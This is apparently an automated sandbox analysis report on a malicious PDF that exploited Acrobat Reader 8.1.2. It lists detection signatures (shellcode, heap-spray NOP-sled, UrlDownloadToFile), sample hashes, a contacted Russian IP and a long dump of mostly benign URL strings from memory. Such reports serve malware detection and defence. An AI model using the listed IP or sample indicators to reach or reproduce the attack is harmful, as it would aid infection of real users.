Loading ...

General Information

Analysis ID:27417
Start time:15:14:04
Start date:16/11/2012
Overall analysis duration:0h 3m 32s
Sample file name:58fdd7befdcfcfca285543d6e0c0da0f.pdf
Cookbook file name:Ret Dump.jbs
Analysis system description:XP SP3 (Office 2003 SP1, Java 1.5.0, Acrobat Reader 8.1.2, Internet Explorer 6, Flash 10.1.82.76)
Number of analysed new started processes analysed:1
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
SCAE enabled:true
SCAE success:false, ratio: 0%

Classification / Threat Score

Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

Matching Signatures

Behavior Signatures
Creates temporary files
Reads ini files
Urls found in memory or binary data
Creates mutexes\BaseNamedObjects\oleacc-msaa-loaded \BaseNamedObjects\Global\AcrobatViewerIsRunning
Downloads files from webservers via HTTP
Found strings which match to known bank urls
Found strings which match to known social media urls
May tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Detected shellcode (checkout the disassembly section)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (performs HTTP gets)
Document exploit detected (unknown TCP traffic)
NOP-sled detected (often used during heap spraying before exploitation)

Code Signatures
Contains functionality to download additional files from the internet

Startup

  • system is xp2
  • AcroRd32.exe (PID: 1776 MD5: 80660C611B596FFE8AF4074B31AA6FB7)
  • cleanup

Created / dropped Files

File PathMD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AcrD8AE.tmpC046CC90363EBD2C6F80E2E7F8C7793D

Contacted Domains

No contacted domains info

Contacted IPs

IPCountryPingableOpen Ports
79.137.237.66RUSSIAN FEDERATIONfalse

Static File Info

File type:PDF document, version 1.6
File name:58fdd7befdcfcfca285543d6e0c0da0f.pdf
File size:13252
MD5:58fdd7befdcfcfca285543d6e0c0da0f
SHA1:babce866503fbe880cdcf38f39b890ac612e6722
SHA256:b492d1b032814ab0904f24aecb9d14bb159fe77f457e23e250a859158284b240
SHA512:d8a2728715cc51e8affeaa6dcddc605c8c16c2abbfa32b1245a703df94cf8aad8c99e13c32b558acb18747e63e0810f33a91cabb12d5e4c10d558f456e795fff

String Analysis

URLs
String valueSource
http://a.ads2.msads.net/cis/11/000/000/000/022/056.jAcroRd32.exe
http://a.ads2.msads.net/cis/56/000/000/000/000/000.gAcroRd32.exe
http://a.rad.msn.com/adsadclient31.dll?getsad=&dpjs=4&pn=msft&id=1be25b89169c67282f395932129c67da&muAcroRd32.exe
http://ad.doubleclick.net/ad/n6374.132541.msn.com/b5976918;sz=1x1;ord=189708926AcroRd32.exe
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/2373.1225.tk.177x20/9920374AcroRd32.exe
http://adobe.tt.omtrdc.net/m2/adobe/sc/standard?mboxhost=kb2.adobe.com&mboxsession=1327395957406-706AcroRd32.exe
http://ads1.msn.com/library/dapmsn.AcroRd32.exe
http://ads2.msads.net/cis/18/000/000/000/021/868.pAcroRd32.exe
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.AcroRd32.exe
http://amch.questionmarket.com/adsc/d944682/3/944772/randm.AcroRd32.exe
http://api-public.addthis.com/url/shares.json?url=http%3a%2f%2fwww.oldapps.com%2fadobe_reader.php%3fAcroRd32.exe
http://api-public.addthis.com/url/shares.json?url=http%3a%2f%2fwww.oldapps.com%2fadobe_reader.php&caAcroRd32.exe
http://api-public.addthis.com/url/shares.json?url=http%3a%2f%2fwww.oldapps.com&callback=_ate.cbs.sc_AcroRd32.exe
http://api.bing.com/qsonhs.aspx?form=msn005&AcroRd32.exe
http://api.demandbase.com/api/v2/ip.js?key=e4086fa3ea9d74ac2aae2719a0e5285dc7075d7b&var=s_dmdbase_v_AcroRd32.exe
http://apis.google.com/js/plusone.AcroRd32.exe
http://blst.msn.com/as/wea3/i/en-us/law/32.gAcroRd32.exe
http://cache.oahermes.com/css/main_1.cAcroRd32.exe
http://cache.oahermes.com/css/oa.cAcroRd32.exe
http://cache.oahermes.com/css/style.cAcroRd32.exe
http://cache.oahermes.com/css/style1.cAcroRd32.exe
http://cache.oahermes.com/fancybox/blank.gAcroRd32.exe
http://cache.oahermes.com/fancybox/fancy_close.pAcroRd32.exe
http://cache.oahermes.com/fancybox/fancy_nav_left.pAcroRd32.exe
http://cache.oahermes.com/fancybox/fancy_nav_right.pAcroRd32.exe
http://cache.oahermes.com/fancybox/fancybox.pAcroRd32.exe
http://cache.oahermes.com/image/arrow_green.gAcroRd32.exe
http://cache.oahermes.com/image/arrow_grey.gAcroRd32.exe
http://cache.oahermes.com/image/bg_midcon.gAcroRd32.exe
http://cache.oahermes.com/image/bg_midconpr.pAcroRd32.exe
http://cache.oahermes.com/image/dotted_bg.gAcroRd32.exe
http://cache.oahermes.com/image/download.pAcroRd32.exe
http://cache.oahermes.com/image/footer_bg.pAcroRd32.exe
http://cache.oahermes.com/image/grey_tab.pAcroRd32.exe
http://cache.oahermes.com/image/logo.pAcroRd32.exe
http://cache.oahermes.com/image/mid_blackbg.gAcroRd32.exe
http://cache.oahermes.com/image/mid_bottom.gAcroRd32.exe
http://cache.oahermes.com/image/mid_cat_ind.gAcroRd32.exe
http://cache.oahermes.com/image/mid_leftcorner.pAcroRd32.exe
http://cache.oahermes.com/image/mid_rightcorner.pAcroRd32.exe
http://cache.oahermes.com/image/midnv1.pAcroRd32.exe
http://cache.oahermes.com/image/more.gAcroRd32.exe
http://cache.oahermes.com/image/nav_1.gAcroRd32.exe
http://cache.oahermes.com/image/oasprite2.pAcroRd32.exe
http://cache.oahermes.com/image/os1.pAcroRd32.exe
http://cache.oahermes.com/image/point.gAcroRd32.exe
http://cache.oahermes.com/image/search.pAcroRd32.exe
http://cache.oahermes.com/image/sep1.gAcroRd32.exe
http://cache.oahermes.com/image/shadow.gAcroRd32.exe
http://cache.oahermes.com/image/top_curve_midbottompr.pAcroRd32.exe
http://cache.oahermes.com/image/top_curve_midcontpr.pAcroRd32.exe
http://cache.oahermes.com/image/windowtab.pAcroRd32.exe
http://cache.oahermes.com/images/input_bg_slice.pAcroRd32.exe
http://cache.oahermes.com/images/open_new_window.pAcroRd32.exe
http://cache.oahermes.com/js/custom01.AcroRd32.exe
http://cache.oahermes.com/softimg/pdf-logo.gAcroRd32.exe
http://cdn.api.twitter.com/1/urls/count.json?url=http%3a%2f%2fwww.oldapps.com%2f&callback=twttr.receAcroRd32.exe
http://cgi.adobe.com/special/acrobat/updaAcroRd32.exe
http://ch.questionmarket.com/w3c/audit2007/p3p_dynamiclogic.xmAcroRd32.exe
http://col.stb.s-msn.com/i/25/b339a1e8e65447642b9f0ddad0e.jAcroRd32.exe
http://col.stb.s-msn.com/i/26/d59641387bf748337c126ad1957c2.jAcroRd32.exe
http://col.stb.s-msn.com/i/30/24fdf2cd8be5e4cfb52e27f92bdef4.jAcroRd32.exe
http://col.stb.s-msn.com/i/37/423d8428977d46cc6ebfecc452b0d0.jAcroRd32.exe
http://col.stb.s-msn.com/i/3a/b0da1e93d2fae7a81098776a2efdfd.jAcroRd32.exe
http://col.stb.s-msn.com/i/3e/7cef4323cd2894f4fb6a6d5ae5aa9e.jAcroRd32.exe
http://col.stb.s-msn.com/i/55/f3731528f70d131f63b12e5ce4ce.jAcroRd32.exe
http://col.stb.s-msn.com/i/5a/a825aeb11f7fbaa1682967885b0bb.jAcroRd32.exe
http://col.stb.s-msn.com/i/65/cdab2f44a1591d2b308c20c6c15375.jAcroRd32.exe
http://col.stb.s-msn.com/i/6f/40e0e7b0930b1dfead9e668b98d6.jAcroRd32.exe
http://col.stb.s-msn.com/i/98/bc71769ba96df69cfe934397d8824a.jAcroRd32.exe
http://col.stb.s-msn.com/i/9d/5ee4ca92f2c86b9b7969e3851ff30.jAcroRd32.exe
http://col.stb.s-msn.com/i/9e/f415cf42cce232a2532ba451bef3.jAcroRd32.exe
http://col.stb.s-msn.com/i/a4/f1284a44194776bf5c17c6e522a529.jAcroRd32.exe
http://col.stb.s-msn.com/i/b7/eb75d45b8948f72ee451223e95a96.gAcroRd32.exe
http://col.stb.s-msn.com/i/d0/4278717f7c190e446356444e97f5a.jAcroRd32.exe
http://col.stb.s-msn.com/i/d1/2a789319d730bbfee7294a39a8c679.jAcroRd32.exe
http://col.stb.s-msn.com/i/d2/61c2fc3513db668220918204e27.jAcroRd32.exe
http://col.stb.s-msn.com/i/d8/9e3c8db312445bb97be3c0469d3731.jAcroRd32.exe
http://col.stb.s-msn.com/i/e2/37ba92e210d341bfdbf4126422a3d2.gAcroRd32.exe
http://col.stb.s-msn.com/i/e9/ae875fab1f44e47994f2fee50c187.jAcroRd32.exe
http://col.stb.s-msn.com/i/fd/c7a5cbf8b632766bf5188569661116.jAcroRd32.exe
http://col.stc.s-msn.com/br/sc/css/36/8c1ae01e8fd4f4408590d43df0f4e3.cAcroRd32.exe
http://col.stc.s-msn.com/br/sc/css/3c/e52849405b21b1b7b78858e8f94f2f.cAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/07/617475cf39bf6f5c0bd6ecb985335c.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/0c/c57bc2a7d38843d7c4aa8028fc9f82.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/5f/5280118e68aedbc5821d17132a5340.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/7d/7fda667169fb45760dd7152ddafd78.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/c1/cc36ca69630adc1a2052edc7351a47.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/f8/614595fba50d96389708a4135776e4.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/ff/adchoices_gif2.gAcroRd32.exe
http://col.stc.s-msn.com/br/sc/i/icons/bing_websearch_2.jAcroRd32.exe
http://col.stj.s-msn.com/br/sc/js/51/anatm.AcroRd32.exe
http://col.stj.s-msn.com/br/sc/js/cf/ece838bdac41f565b1c59d87c4c9cf63.AcroRd32.exe
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.AcroRd32.exe
http://community.adobe.com/help/badge/ionsupport.AcroRd32.exe
http://connect.facebook.net/en_us/all.AcroRd32.exe
http://crl.verisign.com/pca3.crAcroRd32.exe
http://crl.verisign.com/thawtetimestampingca.crAcroRd32.exe
http://crl.verisign.com/tss-ca.crAcroRd32.exe
http://csc3-2004-aia.verisign.com/csc3-2004-aia.ceAcroRd32.exe
http://csc3-2004-crl.verisign.com/csc3-2004.crlAcroRd32.exe
http://download-euro.oldapps.com/adobe_reader/adberdr812_en_us.eAcroRd32.exe
http://download.adobe.com/pub/adobe/reader/all/7x/7.0/enu/reader.pdfadobeAcroRd32.exe
http://ec.atdmt.com/bAcroRd32.exe
http://edge.quantserve.com/quant.AcroRd32.exe
http://feeds.feedburner.com/~fc/oldapps?bg=ff6600&fg=000000&animAcroRd32.exe
http://google.com/pagead/drt/AcroRd32.exe
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2739591798241468&output=html&h=280&slotnAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2739591798241468&output=html&h=60&slotnaAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2739591798241468&output=html&h=600&slotnAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/drtAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=cicagicqzv7ypxdqahiyajii5h9ywd4r-AcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=cicagmdo7cc9vhdqahiyajiihogkdjt61AcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=cin76tkr2bqv2aeq0aiymaiycfin0jjcqpAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=ckjbp_hsivvsdbdqahiyajiiind9b_dwcAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=cksvvrfn2tgqjaeq0aiymaiycpwvqa7rs7AcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=clxtyc3fj4klugeq0aiymaiycnfy3iuegkAcroRd32.exe
http://googleads.g.doubleclick.net/pagead/imgad?id=colbhodsp-iarrduaxg8mgg2iu8vplicAcroRd32.exe
http://js.dmtry.com/antenna2.js?246_1807_36579_9&sz=300x2AcroRd32.exe
http://kb2.adobe.com/cps/155/tn_15507.htAcroRd32.exe
http://kb2.adobe.com/cps/css/feedbackbadge.cAcroRd32.exe
http://kb2.adobe.com/cps/css/kb2style.cAcroRd32.exe
http://kb2.adobe.com/cps/ssi/assets/jquery-1.5.1.min.AcroRd32.exe
http://kb2.adobe.com/cps/ssi/assets/jquery.query.AcroRd32.exe
http://kb2.adobe.com/cps/ssi/assets/search_button.pAcroRd32.exe
http://kb2.adobe.com/css/support/cps.cAcroRd32.exe
http://kb2.adobe.com/include/img/truste_seal_eu.gAcroRd32.exe
http://kb2.adobe.com/lib/com.adobe/hover.hAcroRd32.exe
http://kb2.adobe.com/uber/js/omniture/mbox.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/cookie.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/globalfooter.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/pane/screen.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/screen/tag-title.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/tabnav/tabzen.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/tree.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/u/adaptcustommouse.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/adobe/u/link.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/lib/animator.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/lib/sifr3-r419/css/sifr-print.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/lib/sifr3-r419/css/sifr-screen.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/lib/style-nurse.hAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/invoke/fire_sifr.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/screen/content-header.sifr.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/tree/print.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/tree/white.cAcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/xnav.AcroRd32.exe
http://kb2.adobe.com/ubi/template/identity/product.cs4/xnav/screen.cAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/system//defaults.cAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/system/def.htAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/system/disqus.jAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/system/embed.AcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/system/reply.htAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/themes/dsq7884a9652e94555c70f96b6be63be216.csAcroRd32.exe
http://mediacdn.disqus.com/1322687430/build/themes/dsq7884a9652e94555c70f96b6be63be216.jAcroRd32.exe
http://mediacdn.disqus.com/1322687430/images/noavatar32.pAcroRd32.exe
http://mediacdn.disqus.com/1322687430/images/themes/houdini/backgrounds-sprite.pAcroRd32.exe
http://mediacdn.disqus.com/1322687430/images/themes/narcissus/dsq-loader-dark.gAcroRd32.exe
http://mediacdn.disqus.com/1322687430/images/toolbar/toolbar-bg.pAcroRd32.exe
http://mediacdn.disqus.com/1322687430/images/toolbar/toolbar-sprite-2.0.pAcroRd32.exe
http://mediacdn.disqus.com/1322687430/js/dist/lib.AcroRd32.exe
http://ns.adobe.com/acrobat/rss/inboAcroRd32.exe
http://ns.adobe.com/acrobat/rss/inbox/:hiddAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviewAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:AcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:bAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:connectionstatAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:docAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:docliAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:doctitAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:foldAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:hasconnectAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isinitiatAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isoffliAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:isonliAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:lastsyAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:latestversiAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:locatiAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:methAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:remoteuAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:serverrevieAcroRd32.exe
http://ns.adobe.com/acrobat/rss/reviews/:workspaAcroRd32.exe
http://ns.adobe.com/xdp/AcroRd32.exe, 58fdd7befdcfcfca285543d6e0c0da0f.pdf
http://oa-comments.disqus.com/embed.AcroRd32.exe
http://oa-comments.disqus.com/thread.js?url=http%3a%2f%2fwww.oldapps.com%2fadobe_reader.php%3fold_adAcroRd32.exe
http://ocsp.verisign.coAcroRd32.exe
http://ocsp.verisign.comAcroRd32.exe
http://oldapps.coAcroRd32.exe
http://oldapps.com/betasearch.php?cx=007779823686351122034%3ai7o_lb6edjm&cof=forid%3a9&ie=utf-8&q=acAcroRd32.exe
http://oldapps.com/favicon.iAcroRd32.exe
http://p4.fsuqxtdj4673q.i6pflvtd7ttkkl76.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.htAcroRd32.exe
http://p4.fsuqxtdj4673q.i6pflvtd7ttkkl76.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.htAcroRd32.exe
http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.pAcroRd32.exe
http://pagead2.googlesyndication.com/pagead/expansion_embed.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.pAcroRd32.exe
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.pAcroRd32.exe
http://pagead2.googlesyndication.com/pagead/js/graphics.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/js/r20111110/r20110914/abg.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/js/r20111110/r20110914/show_ads_impl.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/render_ads.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/show_ads.AcroRd32.exe
http://pagead2.googlesyndication.com/pagead/sma8.AcroRd32.exe
http://platform.twitter.com/js/xd/jsonrpc.AcroRd32.exe
http://platform.twitter.com/js/xd/parent.AcroRd32.exe
http://platform.twitter.com/widgets.AcroRd32.exe
http://platform.twitter.com/widgets/hub.htAcroRd32.exe
http://platform.twitter.com/widgets/images/tweet.dfbf1dd98bad9f5b5addd80494650dca.pAcroRd32.exe
http://platform.twitter.com/widgets/tweet_button.htAcroRd32.exe
http://rad.msn.com/adsadclient31.dll?getsad=&dpjs=4&pn=msft&id=1be25b89169c67282f395932129c67da&muidAcroRd32.exe
http://s1.2mdn.net/viewad/2809226/1x1.gAcroRd32.exe
http://s7.addthis.com/js/250/addthis_widget.AcroRd32.exe
http://s7.addthis.com/js/250/plugin.sharecounter.AcroRd32.exe
http://s7.addthis.com/static/r07/counter71.cAcroRd32.exe
http://s7.addthis.com/static/r07/sh69.htAcroRd32.exe
http://s7.addthis.com/static/r07/widget35_32x32.pAcroRd32.exe
http://s7.addthis.com/static/r07/widget71.cAcroRd32.exe
http://s7.addthis.com/static/r07/widgetbig71.cAcroRd32.exe
http://s7.addthis.com/static/t00/nsc01.gAcroRd32.exe
http://s7.addthis.com/static/t00/tbc02.gAcroRd32.exe
http://schemas.microsoft.com/sharepoint/soaAcroRd32.exe
http://screenshots.oahermes.com/10/small_1_adobe_raeder-9.pAcroRd32.exe
http://screenshots.oahermes.com/10/small_2_adobe_raeder-9-tools.pAcroRd32.exe
http://screenshots.oahermes.com/10/small_3_adobe_raeder-9-about.pAcroRd32.exe
http://screenshots.oahermes.com/10/small_41_adobe%20reader%208.1.2-about.pAcroRd32.exe
http://screenshots.oahermes.com/10/small_42_adobe%20reader%208.1.2-main-window.pAcroRd32.exe
http://screenshots.oahermes.com/10/small_43_adobe%20reader%208.1.2-tools.pAcroRd32.exe
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukdcc4r.pAcroRd32.exe
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/3vr-wui-xma.cAcroRd32.exe
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/2y3yodppa_k.AcroRd32.exe
http://tps30.doubleverify.com/visit.gif?ctx=965891&cmp=1113445&sid=772433&plc=123456&adid=&dvtagver=AcroRd32.exe
http://www.adobe.com$isocountry$special/products/acrobat/apip.htmlhttp://www.adobe.com$isocountry$miAcroRd32.exe
http://www.adobe.com/acrobat&doAcroRd32.exe
http://www.adobe.com/acrobat/AcroRd32.exe
http://www.adobe.com/acrobat/http://www.adobe.com/offer/110400http://www.adobe.com/acrofamily/main.hAcroRd32.exe
http://www.adobe.com/acrobattheAcroRd32.exe
http://www.adobe.com/acrobatthisAcroRd32.exe
http://www.adobe.com/go/sc_learn_morethisAcroRd32.exe
http://www.adobe.com/images/shared/download_buttons/get_flash_player.gAcroRd32.exe
http://www.adobe.com/products/acrobat/alternate.html&downloadAcroRd32.exe
http://www.adobe.com/products/acrobat/readstep2.htAcroRd32.exe
http://www.adobe.com/security/partners_cds.htmlhttp://www.adobe.com/products/acrobat/readstep2.htmlcAcroRd32.exe
http://www.adobe.com/support/expert_support/main.htmlhttp://www.adobe.com/support/products/acrobat.hAcroRd32.exe
http://www.adobe.com/support/techdocs/332720.htmlhttp://www.adobe.com/support/jp/support/acro8j_prn.AcroRd32.exe
http://www.adobe.com/type/legal.htAcroRd32.exe
http://www.adobe.com/type/legal.htmlcoAcroRd32.exe
http://www.adobe.com/typehttp://www.adobe.com/type/legal.htAcroRd32.exe
http://www.bing.com/partner/primedns.gAcroRd32.exe
http://www.bing.com/s/as/899538/en.AcroRd32.exe
http://www.dictionary.com/cgi-bin/dict.pl?terAcroRd32.exe
http://www.google-analytics.com/ga.AcroRd32.exe
http://www.google.ch/extern_js/f/cgjkzricy2grmeu4acwrmfo4acwrma44acwrmbc4acwrmdw4acwrmfe4acwrmao4ajoAcroRd32.exe
http://www.google.ch/extern_js/f/cgjkzricy2grmfo4acwrma44acwrmao4ajocamhllcswgdgaliacujacza/i-5po2l6AcroRd32.exe
http://www.google.ch/images/mgyhp_sm.pAcroRd32.exe
http://www.google.ch/images/nav_logo_hp2.pAcroRd32.exe
http://www.google.ch/images/srpr/nav_logo80.pAcroRd32.exe
http://www.google.ch/intl/en_com/images/srpr/logo1w.pAcroRd32.exe
http://www.google.ch/search?hl=de&source=hp&q=flashAcroRd32.exe
http://www.google.ch/url?q=http://kb2.adobe.com/cps/155/tn_15507.html&sa=u&ei=jg80t6pwkmkp8aozwog_agAcroRd32.exe
http://www.google.comAcroRd32.exe
http://www.google.com/adsense/search/ads.js?vAcroRd32.exe
http://www.google.com/afsonline/show_afs_search.AcroRd32.exe
http://www.google.com/cse/api/branding.cAcroRd32.exe
http://www.google.com/cse/style/look/default.cAcroRd32.exe
http://www.google.com/cse?cx=007779823686351122034%3ai7o_lb6edjm&cof=forid%3a9&ie=utf-8&q=acrobatAcroRd32.exe
http://www.google.com/cse?q=acrobat%20reader&client=google-coop&hl=en&r=s&cx=007779823686351122034%3AcroRd32.exe
http://www.google.com/jsaAcroRd32.exe
http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657AcroRd32.exe
http://www.google.com/uds/?file=ads&v=3&packages=search&asyncAcroRd32.exe
http://www.google.com/uds/?file=search&vAcroRd32.exe
http://www.google.com/uds/api/ads/3.0/727076703967082c2c700dd75598e13c/search.i.AcroRd32.exe
http://www.google.com/uds/api/ads/3.0/727076703967082c2c700dd75598e13c/search.in.AcroRd32.exe
http://www.google.com/uds/api/search/1.0/80172cf7a55bd7af40ed212a27aba261/defaultAcroRd32.exe
http://www.google.com/uds/gwebsearch?callback=google.search.websearch.rawcompletion&rsz=filtered_cseAcroRd32.exe
http://www.google.com/uds/stats?r0=afs_render&u_his=2&u_tz=-480&dt=1322772175029&u_w=792&u_h=660&bs=AcroRd32.exe
http://www.google.com/url?q=http://www.oldapps.com/adobe_reader.php&sa=u&ei=y-vxtq2lc8e78gph9nxjdq&vAcroRd32.exe
http://www.googleadservices.com/pagead/p3p.xmlAcroRd32.exe
http://www.msn.coAcroRd32.exe
http://www.oldapps.com/adobe_reader.pAcroRd32.exe
http://www.oldapps.com/adobe_reader.php?app=9940256ca2663d6cd21f6704b564c5AcroRd32.exe
http://www.oldapps.com/adobe_reader.php?old_adobe=AcroRd32.exe
http://www.oldapps.com/adobe_reader.php?old_adobe=17?downloAcroRd32.exe
http://www.oldapps.com/favicon.iAcroRd32.exe
http://www.w3.org/1999/xhtAcroRd32.exe
http://www.w3.org/1999/xhtmlAcroRd32.exe
http://www.xfa.org/schema/xci/1.AcroRd32.exe
http://www.xfa.org/schema/xfa-data/1AcroRd32.exe
http://www.xfa.org/schema/xfa-data/1.AcroRd32.exe
http://www.xfa.org/schema/xfa-data/1.0AcroRd32.exe, 58fdd7befdcfcfca285543d6e0c0da0f.pdf
http://www.xfa.org/schema/xfa-data/1.0/AcroRd32.exe
http://www.xfa.org/schema/xfa-template/2AcroRd32.exe
http://www.xfa.org/schema/xfa-template/2.AcroRd32.exe
http://www.xfa.org/schema/xfa-template/2.5AcroRd32.exe, 58fdd7befdcfcfca285543d6e0c0da0f.pdf
http://wwwimages.adobe.com/uber/js/omniture_s_code.AcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/sitefooter/close.pAcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/sitefooter/region_black.pAcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/sitefooter/region_blue.pAcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/sitefooter/tile_fat_8bit.pAcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/siteheader/arrow_dark.pAcroRd32.exe
http://wwwimages.adobe.com/ubi/template/identity/adobe/screen/siteheader/cart_dark.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/images/shared/download_buttons/get_flash_player.gAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/module/productselector/gvascript.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/module/searchbuddy.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/template/search/buddy/screen.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/lib/com.adobe/urlparser.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/carousel/noscript.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/globalnav.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/modal.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/print.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/common.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/data.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/gfooter.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/gfooter_override.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/gnav.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/icon.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/icon/search.gAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/layout.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/list.menu.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/evidon.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_acrobat.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_creativeAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_digipub.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_flashserAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_mobile.pAcroRd32.exe
